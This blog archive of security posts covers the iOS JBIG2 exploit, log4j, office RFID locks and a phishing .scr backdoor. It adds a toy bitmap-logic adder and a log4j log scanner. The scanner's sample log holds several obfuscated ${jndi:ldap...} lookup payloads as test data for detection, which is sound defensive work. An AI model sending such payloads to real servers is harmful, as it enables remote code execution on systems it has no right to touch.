
Symbolic Forest

A homage to loading screens.

Blog : Posts tagged with ‘security’

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it: all their phone has to do is receive it, and the hacker can take their phone over. At least, could: the hole was fixed three months ago, in iOS 14.8, so anything later is safe. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever, whatever the GIF itself actually says to do. It does this in an unhealthy way, though. The code that opens the file to change it doesn’t care whether the file is actually a GIF: it sniffs the contents, says “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these”, and decodes it as whatever format it really is. Even if it’s not a GIF and therefore has no loop count that needs patching; and even though that means running a whole pile of other image decoders on a file sent by a stranger.

Second, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to decode embedded images in an obscure and rather out-of-date format (JBIG2) mostly used by fax machines and scanners. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now), so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does with the bug, though, is frankly brilliant. It uses the logical operations that this particular compression format provides for combining bits of an image with each other to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms means that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.
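As an added illustration (not part of the original post, and not the Project Zero analysis or the exploit itself): JBIG2, the fax-oriented format mentioned above, lets a decoder merge one bitmap region onto another with a small set of operators (OR, AND, XOR, XNOR). The toy model below, in Python, gives a one-dimensional “page” whose only primitive is that kind of composite step, and builds a full adder and then a ripple-carry adder out of nothing else. The cell layout, the Page class and the function names are assumptions made for this example; the point is that once an attacker controls which regions get combined with which operator, arithmetic over memory comes for free.

```python
# Toy model (assumption: modelled on JBIG2's region composition operators,
# not the real decoder and not the exploit). The only primitive a "page"
# offers is: overwrite dst with (dst OP src), one bit at a time.
OPS = {
    "OR":   lambda d, s: d | s,
    "AND":  lambda d, s: d & s,
    "XOR":  lambda d, s: d ^ s,
    "XNOR": lambda d, s: 1 - (d ^ s),
}


class Page:
    """A one-dimensional bitmap with a single operation, composite()."""

    def __init__(self, size):
        self.bits = [0] * size
        self.ops_run = 0          # how many "segments" the program needed

    def composite(self, op, src, dst):
        self.bits[dst] = OPS[op](self.bits[dst], self.bits[src])
        self.ops_run += 1


def clear(p, cell):
    # cell XOR cell == 0, so a region can be zeroed without any constant-zero region
    p.composite("XOR", cell, cell)


def not_into(p, x, dst):
    # 0 XNOR x == NOT x
    clear(p, dst)
    p.composite("XNOR", x, dst)


def full_adder(p, a, b, cin, s, cout, t):
    """s = a ^ b ^ cin; cout = (a & b) | (cin & (a ^ b)); t is a scratch cell."""
    clear(p, s);    p.composite("XOR", a, s);   p.composite("XOR", b, s)     # s = a ^ b
    clear(p, t);    p.composite("XOR", s, t);   p.composite("AND", cin, t)   # t = cin & (a ^ b)
    p.composite("XOR", cin, s)                                               # s = a ^ b ^ cin
    clear(p, cout); p.composite("XOR", a, cout); p.composite("AND", b, cout) # cout = a & b
    p.composite("OR", t, cout)                                               # cout |= t


def ripple_add(x, y, nbits):
    """Add two nbits-wide integers using nothing but composite() steps.

    Returns (sum_including_carry_out, number_of_composite_steps)."""
    n = nbits
    # Layout (assumption for this example): A, B, SUM are n cells each,
    # CARRY has n + 1 cells, T is one scratch cell.
    A, B, S, C, T = 0, n, 2 * n, 3 * n, 4 * n + 1
    p = Page(4 * n + 2)
    for i in range(n):            # "paint" the operands onto the page, LSB first
        p.bits[A + i] = (x >> i) & 1
        p.bits[B + i] = (y >> i) & 1
    clear(p, C)                   # carry-in of bit 0 is zero
    for i in range(n):
        full_adder(p, A + i, B + i, C + i, S + i, C + i + 1, T)
    total = sum(p.bits[S + i] << i for i in range(n)) | (p.bits[C + n] << n)
    return total, p.ops_run


def exhaustive_check(nbits):
    """Compare the bitmap adder against Python's + for every input pair."""
    return all(ripple_add(x, y, nbits)[0] == x + y
               for x in range(1 << nbits) for y in range(1 << nbits))


if __name__ == "__main__":
    total, steps = ripple_add(13, 7, 4)
    print(f"13 + 7 = {total} using {steps} composite steps")
    print("3-bit adder matches Python for all inputs:", exhaustive_check(3))
```

Nothing in that program is executable code: it is a list of (operator, source, destination) triples, which is the shape an image decoder’s region commands take. Every gate costs a few composite steps, and clearing a cell by XOR-ing it with itself is the trick that avoids needing any constant-zero region to start from.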

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. A huge proportion of the Java server-side code out there uses log4j somewhere inside it, directly or through some other library it depends on, to handle this sort of thing.

Unfortunately, log4j has a few features that were originally intended to be helpful, but aren’t necessarily a good idea to have switched on in an internet-facing server that does important work such as processing your banking requests. In particular: if a log message contains a specially formatted lookup (written as ${jndi:…} and pointing at a URL), log4j will spot it, contact that URL, fetch what it finds there, and, on a vulnerable setup, run it as code. Of course, you might say, there’s nothing wrong with that, because all of the log messages are written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including that special lookup, which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.
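A worked example, added here and not part of the original post: the lookup is written as ${jndi:…} in the logged text, and attackers quickly started hiding it behind nested lookups such as ${lower:j} or ${::-j}, which log4j resolves before it ever sees the jndi: part. The Python below undoes those wrappers (only the lower, upper and default-value forms; other obfuscations exist) and scans a small constructed Apache-style access log, using documentation-range IP addresses, for User-Agent, Referer and request fields that carry such a lookup. The log lines, the field regex and the function names are assumptions made for this example.

```python
import re

# Innermost ${...} with no nested braces inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
# (assumption: constructed sample lines below follow exactly this shape)
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
_KEEP = "\x01{"  # sentinel marking a lookup we have decided not to resolve


def _resolve(m):
    """Evaluate one innermost lookup the way log4j's string substitution would."""
    body = m.group(1)
    if ":-" in body:                     # ${x:-default} -> default  (e.g. ${::-j}, ${env:NOPE:-j})
        return body.split(":-", 1)[1]
    if body[:6].lower() == "lower:":     # ${lower:J} -> j
        return body[6:].lower()
    if body[:6].lower() == "upper:":     # ${upper:j} -> J
        return body[6:].upper()
    return _KEEP + body + "}"            # jndi:, sys:, date: ... leave in place


def normalize_lookups(text, max_rounds=64):
    """Peel nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text.replace(_KEEP, "${")


def contains_jndi_lookup(text):
    return _JNDI.search(normalize_lookups(text)) is not None


def scan_log_lines(lines):
    """Return (line_number, normalized_field) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _CLF.match(line)
        # Attacker-controlled fields first; fall back to the whole line if it isn't CLF.
        fields = [m.group("ua"), m.group("ref"), m.group("req")] if m else [line]
        for field in fields:
            norm = normalize_lookups(field)
            if _JNDI.search(norm):
                hits.append((n, norm))
                break
    return hits


# Constructed sample access log (not real traffic): one benign browser, three
# attempts hidden in the User-Agent header (plain, lower/default-value
# obfuscated, env-default obfuscated), and one noisy line with an unrelated lookup.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:10:00 +0000] "GET /balance HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"',
    '203.0.113.8 - - [10/Dec/2021:09:10:03 +0000] "GET /balance HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:09:10:05 +0000] "GET /balance HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}${::-d}${::-i}:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.10 - - [10/Dec/2021:09:10:07 +0000] "GET /balance HTTP/1.1" 200 512 "-" '
    '"${${env:NOTEXIST:-j}ndi:rmi://203.0.113.5:1099/b}"',
    '203.0.113.11 - - [10/Dec/2021:09:10:09 +0000] "GET /balance HTTP/1.1" 200 512 "-" '
    '"curl/7.79.1 ${sys:user.home}"',
]

if __name__ == "__main__":
    for n, payload in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

A plain search for the literal text “jndi” misses lines 3 and 4 entirely, which is why the normalisation step matters; it is also why the real fix is to upgrade the library rather than to filter incoming headers.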

The fix for this is straightforward (upgrade to a patched version of the library), but rolling it out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed once it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled over by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Flying

In which travel is a bad idea

Well, I’m glad I’m not going anywhere today. Not just in a plane, but anywhere that might involve driving past an airport, because no doubt the traffic around them will be awful too.

Today demonstrates the horror of 24-hour news. I’m just as bad as everyone else, refreshing the BBC News site every five minutes to get the latest on the Terror Alert. The news reports, meanwhile, are filled with hyperbolic phrases such as “mass murder on an unimaginable scale”.* No it isn’t. People have imagined it. To quote The Princess Bride, “I do not think you know what that word means.”

The government seems to be stuck between a rock and a hard place, when it comes to statements. “We have arrested everyone involved, apart from the ones we haven’t”. “This is nothing to do with race, but we’re talking to Community Leaders about it.” How do you become a Community Leader, anyway? Are there elections?

No doubt bottled liquids will be confiscated on planes for the next few months, before everything goes back to normal, and the next terrorist attack comes along with something completely different. The ones that get through are never the ones you expect, after all.

* To be fair to the media, it was a police spokesman who came up with that exact phrase.

Security (redux)

In which we would like to hack

Via Boing Boing, I’ve discovered a Wired article on RFID hacking, and how it can be used practically for breaking and entering. I can virtually see your eyes glazing over already: but, see, this is important to me at least. The security technologies described in the article are suspiciously like the ones which have recently been installed in the office at great expense.

Now, it is possible that our security consultant has installed the extra-secure encrypted systems described in the article, that are much harder to break into. Given that I’ve had to work with him, though, I’d be surprised if he even realised the difference between the two. I really must show this to Big Dave, and see if we can get our hands on the RFID-reading kit described, if only because it will really irritate Security Man.

Security (part two)

In which a contractor doesn’t do the job properly

So, as I explained yesterday, the security contractor at the office has saddled us with three “incompatible” security systems, two of which probably are compatible after all, it’s just that he doesn’t know how to get them to work together. We complained to the office manager about it. “Well, if that’s what the contractor said, that’s what’s going to happen.”

The next day, our boss comes through to visit. “What’s this about us needing three different tags for the alarms?”

We told him what we’d been told.

“It’s a bloody stupid idea. I thought they were all going to work together.” Yes, so did we. “I don’t want to have to carry three tags on my keyring.” And he wanders off, grumbling about it.

The following day, we notice the Managing Director stalking about in our part of the building, looking at the security gadgets and making “hmmm…” noises. The office manager is following him around, trying to explain how wonderful these expensive systems we’ve commissioned are.

“…you’ll have one tag for these doors, one tag for the outside doors and gates, one tag for…”

“Why do we need three different tags for everything? Why can’t we just have one?”

“The contractor says that they won’t…”

“Well, I thought we were just going to have one tag that would do everything. I don’t want…”

I tuned out, but it was clear the way the conversation was going. What makes me sigh isn’t that we always prefer contractors who have worked for us before, even when their track record is hardly promising.* It’s that the management should have spotted this coming. The contractor did give the office manager a nice thick specifications document – did the manager bother to read it at all? Didn’t he bother to ask questions about the vague parts?

* This isn’t the first time the security contractor has fitted something and then not set it up properly, because although he’s agreed to fit the system we wanted he’s not willing to learn how to configure it.

Security

Or, a story of incompatibility

As part of all the building work that’s been going on at the office, we’ve been getting the security systems upgraded. A new alarm system, new motorised front gates,* and new electronic locks on most of the internal doors. All to be worked by RFID tags, kept on our keyrings and carried round all the time.

Now, being logical and sensible, we assumed that the company had specified either a single system, or compatible systems, so that we could use one single tag to unlock everything. Therefore we were pleased to spot, as the contractor** started to install the hardware, that all the sensors we could see came from the same manufacturer. Very sensible.

We each get a tag the other week, and start using it to open and shut the front gates. Three days ago, the contractor pops his head round the door to say he’ll be issuing us with the rest of the tags, the ones for the indoor locks, soon.

“The rest of the tags? We’ve already got one.”

Apparently, we need separate ones for the outdoor locks, the indoor locks, and the alarm system itself. Because “the systems are from different manufacturers.”

“But they’re not from different manufacturers! We’ve seen them, and they’re identical! If you hold an outdoor tag up to an indoor sensor, it recognises it!”

“No it doesn’t.”

I held my “outdoor tag” up to the newly-installed sensor by the office door. It bleeped, and flashed a little green light at me.

“Well, I can try to set it up so that that tag unlocks this door,” the contractor said. “But it won’t work.”

(to be continued, otherwise this post would get a bit long)

* This is a Good Thing, because guess whose job it is to unlock and open the old front gates every morning.

** Our usual security contractor, a friendly chap, who is very anal about making sure his cabling is put in and terminated neatly, but isn’t very good at setting up the security systems themselves properly.

Viruses, and other geekery

In which we still have no satellite internet, and encounter a virus

Quite a few people, recently, have come to this site looking for information on Aramiska, the European satellite ISP which apparently collapsed last week. Sadly, there doesn’t seem to be any information, anywhere. The company promised to release a statement on January 30th; it never appeared. Their disappearance is still a mystery.

Moving on, this email came in to one of our work addresses yesterday:

I noticed whilst browsing your site that there were problems with some of your links, when I tried again with Internet Explorer the problems were not there so I assume that they were caused by me using the Mozilla browser.

Very nice and helpful, you might think.* However, if you read on, you might get a little more suspicious…

I have enclosed a screen capture of the problem so your team can get it fixed if you deem it an issue.

Hah. If you’re not suspicious yet, you probably shouldn’t be allowed near the internet. If you look a little closer, the attachment is a .scr file – which could, I suppose, look like “screenshot” to the non-technical, but which Windows treats as a screensaver, which is to say an ordinary executable program. If you try to open it,** then: congratulations, you have a virus, one known as W32/Brepibot. It’s a “backdoor”, a tool that then enables hackers to connect into your computer and harness it for their own nefarious purposes. Well done.

* As our work website was designed by an apparently-clueless PR chap with no previous knowledge of website design at all, it is also entirely believable.

** and you’re using a Windows computer, and don’t have up-to-date virus protection